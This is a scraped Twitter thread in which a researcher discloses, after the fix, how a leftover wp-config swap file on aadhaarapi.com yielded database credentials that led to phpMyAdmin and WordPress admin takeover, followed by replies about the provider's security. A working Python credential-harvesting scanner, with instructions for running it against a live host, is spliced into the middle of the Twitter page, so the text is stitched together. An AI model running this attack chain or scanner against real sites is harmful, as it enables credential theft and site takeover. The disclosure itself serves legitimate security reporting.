Elliot Alderson
@fs0c131y
French security researcher. Worst nightmare of Oneplus, Wiko, UIDAI, Kimbho and others. Not completely schizophrenic. Not related to USANetwork. DMs open.

Joined June 2015

  • © 2018 Twitter
Elliot Alderson @fs0c131y Jan 19

As the issue is now fixed, let me disclose the details of the @aadhaarapi vulnerability I found 3 days ago. #wordpressForDummies #Aadhaar #AadhaarFail https://twitter.com/fs0c131y/status/953315051389284352 …

Elliot Alderson added,

Elliot Alderson @fs0c131y
.@aadhaarapi can we discuss in private? You will probably be interested in what I have to say pic.twitter.com/nprweIjepW
12:23 AM - 19 Jan 2018
17 replies 242 retweets 233 likes
      1. New conversation
      2. Elliot Alderson‏ @fs0c131y Jan 19

        After a quick @_WPScan_ scan you were able to see this line: "A wp-config.php backup file has been found in: 'https://aadhaarapi.com/.wp-config.php.swp …'" pic.twitter.com/BHnDR0jzDE

        4 replies 49 retweets 66 likes
      3. Elliot Alderson‏ @fs0c131y Jan 19

        After the download of this file, you could open it like this: vim -R .wp-config.php.swp and obtain the database user and password. pic.twitter.com/qTdweo5NJP

        3 replies 39 retweets 44 likes
      4. Elliot Alderson‏ @fs0c131y Jan 19

        Next step was to find the phpmyadmin panel. Testing the port 2083 or /phpmyadmin is always a good idea. pic.twitter.com/ngB5eRkUWc

        1 reply 25 retweets 33 likes
      5. Elliot Alderson‏ @fs0c131y Jan 19

        After login, open the wp-user table and change the password of an existing user. Go to /wp-admin and enter the username with the new password, you are in!

        2 replies 35 retweets 48 likes
      6. Elliot Alderson‏ @fs0c131y Jan 19

        Issue found: 16 Jan
        1st contact with @aadhaarapi: 17 Jan
        Issue fixed: 17 Jan

        2 replies 27 retweets 46 likes
      7. Elliot Alderson‏ @fs0c131y Jan 19

        .@aadhaarapi after having been caught with an issue like this, can I suggest that you, at least, update your #wordpress plugins 🤦‍♂️? pic.twitter.com/0tzCv7XcPN

        5 replies 58 retweets 122 likes
      8. End of conversation
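The thread above is one chain: a scanner flags a leftover Vim swap file next to wp-config.php, the swap file is opened read-only to read the DB_* defines, and the database credentials are then reused against phpMyAdmin. The Python below is an added example written for this page, not the author's tooling and not WPScan. It shows why the swap file gives up the secrets even without vim (Vim keeps each buffer line as a NUL-terminated string inside its data blocks, so a regex over the raw bytes recovers the define() lines), builds the leftover filenames worth probing for a given file (including the dot-prefixed form Vim uses), and runs the probe through an injectable fetch function so it can be exercised offline against a constructed swap file. The host example.invalid, the suffix list and the contents of SAMPLE_SWAP are assumptions made for the example.

```python
"""Probe for leftover editor swap / backup copies of wp-config.php and pull
the DB_* constants out of one.  Added example for this page; the suffix
list, the host example.invalid and SAMPLE_SWAP are assumptions."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional
from urllib.parse import urljoin

# Every Vim swap file starts with this magic ("b0VIM " followed by the version).
VIM_SWAP_MAGIC = b"b0VIM "

# Names an editor or a sloppy backup typically leaves beside wp-config.php.
# Own selection for this example, not WPScan's wordlist.
BACKUP_SUFFIXES = [".swp", ".swo", "~", ".bak", ".old", ".orig", ".save", ".txt"]

# define('DB_USER', 'value') in either quote style with arbitrary spacing.
DEFINE_RE = re.compile(
    rb"define\s*\(\s*['\"](DB_[A-Z_]+)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)"
)


def candidate_backup_urls(base_url: str, filename: str = "wp-config.php") -> List[str]:
    """URLs worth probing for leftovers of `filename`.  Vim names its swap
    file with a leading dot (.wp-config.php.swp), so both forms are built."""
    urls: List[str] = []
    for suffix in BACKUP_SUFFIXES:
        urls.append(urljoin(base_url, filename + suffix))
        urls.append(urljoin(base_url, "." + filename + suffix))
    return urls


def is_vim_swap(blob: bytes) -> bool:
    """True if the bytes carry Vim's swap-file header."""
    return blob.startswith(VIM_SWAP_MAGIC)


def extract_wp_defines(blob: bytes) -> Dict[str, str]:
    """Recover DB_* constants from the raw bytes of a swap or backup copy.
    Vim stores each buffer line NUL-terminated in its data blocks, so the
    define() lines are intact and no `vim -R` is needed to read them."""
    found: Dict[str, str] = {}
    for match in DEFINE_RE.finditer(blob):
        found[match.group(1).decode()] = match.group(2).decode("utf-8", "replace")
    return found


def http_fetch(url: str, timeout: float = 5.0) -> Optional[bytes]:
    """Stdlib fetcher for live use; None on any HTTP or connection error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, ValueError):
        return None


def find_exposed_configs(
    base_url: str, fetch: Callable[[str], Optional[bytes]] = http_fetch
) -> Dict[str, Dict[str, str]]:
    """Probe every candidate and return {url: {DB_*: value}} for real hits.
    A response with no define() lines (e.g. a soft-404 page) is ignored."""
    hits: Dict[str, Dict[str, str]] = {}
    for url in candidate_backup_urls(base_url):
        body = fetch(url)
        if not body:
            continue
        secrets = extract_wp_defines(body)
        if secrets:
            hits[url] = secrets
    return hits


# Constructed stand-in for a leaked swap file: Vim magic, a little padding,
# then wp-config lines laid out NUL-terminated as in Vim's data blocks.
SAMPLE_SWAP = (
    VIM_SWAP_MAGIC + b"8.0\x00" + b"\x00" * 64
    + b"<?php\x00"
    + b"define('DB_NAME', 'wp_site');\x00"
    + b'define("DB_USER", "wpuser");\x00'
    + b"define( 'DB_PASSWORD', 'Correct-Horse-9' );\x00"
    + b"define('DB_HOST', 'localhost');\x00"
    + b"define('WP_DEBUG', false);\x00"
)


def demo() -> Dict[str, Dict[str, str]]:
    """Offline run: a fake site that serves only the dot-prefixed swap file."""
    fake_site = {"https://example.invalid/.wp-config.php.swp": SAMPLE_SWAP}
    return find_exposed_configs("https://example.invalid/", fake_site.get)


if __name__ == "__main__":
    for url, secrets in demo().items():
        print(url, secrets)
```

Against a live host you would call find_exposed_configs("https://target/") with the default fetcher; the `demo()` path substitutes a dict lookup so nothing leaves the machine. The fix is the one the replies below circle around: do not edit files on the production box, deploy from a reviewed artefact, and have the web server refuse dotfiles and `*.swp`/`*.bak` names under the document root so the next stray swap file is a 403 rather than a credential leak.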
      1. New conversation
      2. Srivatsan Iyer‏ @supersaiyan_9 Jan 19
        Replying to @fs0c131y @aadhaarapi

        Hey @aadharapi, Can you please tell us how the swap file got there? Do you not have a proper deployment process? Or is there no review of what gets committed and pushed? Or do your devs write code on the production machine (scary!)?

        1 reply 8 retweets 20 likes
      3. Suresh R‏ @iamabofh Jan 19
        Replying to @supersaiyan_9 @fs0c131y @aadhaarapi

        Guys at least learn to use puppet if you want to make us poor Indians into puppets at the end of the aadhaar chain. You're doing stupid things I've seen developers fired for, one after the other.

        3 replies 11 retweets 14 likes
      4. AazaadPanchhi‏ @gabbi612 Jan 19
        Replying to @iamabofh @supersaiyan_9 and

        Sir I really don't understand coding at all but you are right. If this had been with a private company the people behind this would have been fired by now.

        3 replies 0 retweets 2 likes
      5. aadipa‏ @aadipa Jan 19
        Replying to @gabbi612 @iamabofh and

        It is a private company, providing paid services on top of data they purchase from UIDAI. It's not Aadhaar itself.

        1 reply 0 retweets 2 likes
      6. Suresh R‏ @iamabofh Jan 19
        Replying to @aadipa @gabbi612 and

        A special sort of private company given the amount of access they have. A security auditor would have nightmares with this entire mess.

        1 reply 1 retweet 4 likes
      7. aadipa‏ @aadipa Jan 19
        Replying to @iamabofh @gabbi612 and

        I did a little Google and found that AadharAPI are just Sub-AUA most probably getting their data from @KhoslaLabs which is primary AUA and responsible for security of data. Here is total list of AUA maintained by UIDAI. https://uidai.gov.in/images/list_of_live_aua.pdf …

        1 reply 1 retweet 4 likes
      8. Suresh R‏ @iamabofh Jan 19
        Replying to @aadipa @gabbi612 and

        Ah, guess where the buck finally stops for security regardless of sub sub sub aua type outsourcing?

        2 replies 1 retweet 1 like
      9. aadipa‏ @aadipa Jan 19
        Replying to @iamabofh @gabbi612 and

        It's not outsourcing.. It's auth service access. As I already said UIDAI need to extend their net. But at same time, you won't blame ICICI or Visa if someone hacks Paytm or PayU stored card database.

        2 replies 0 retweets 0 likes
      10. 4 more replies
      1. New conversation
      2. aadipa‏ @aadipa Jan 19
        Replying to @fs0c131y @aadhaarapi

        @UIDAI can you look into this? You need to extend your security checks to all 3rd party like these and avoid such potential vulnerabilities.

        2 replies 6 retweets 8 likes
      3. Vidyut‏ @Vidyut Jan 19
        Replying to @aadipa @nixxin and

        If their front facing sites are this carelessly coded, is it even safe to integrate the api with production sites?

        1 reply 1 retweet 6 likes
      4. aadipa‏ @aadipa Jan 19
        Replying to @Vidyut @nixxin and

        Exactly.. It's open market. Find some secure ASA if AadharAPI feels insecure. Only thing is, UIDAI/Aadhaar and AadharAPI are two different entities. Don't go with similar names.

        0 replies 0 retweets 1 like
      5. End of conversation
      1. Honkey Dankey‏ @honkey_dankey Jan 19
        Replying to @fs0c131y @aadhaarapi

        ANDDDD... ..JUST LIKE THAT they have the "world's largest private database?" FFS

        0 replies 3 retweets 15 likes
      1. Dinesh Shetty‏ @Din3zh Jan 19
        Replying to @fs0c131y @aadhaarapi

        @rssharma3 @UIDAI - Am assuming you still want to stick to your age old dialogue of 'There has never been an Aadhar breach, and anyone saying otherwise is a liar'?

        0 replies 4 retweets 7 likes
      1. Ravi A‏ @ravinininin Jan 19
        Replying to @fs0c131y @aadhaarapi

        These same jokers (Quagga Tech) were responsible for API key leak that resulted in fakes getting into the system. https://medium.com/karana/insecure-app-making-abd8548c3092 …pic.twitter.com/x3qitug6sS

        0 replies 3 retweets 2 likes
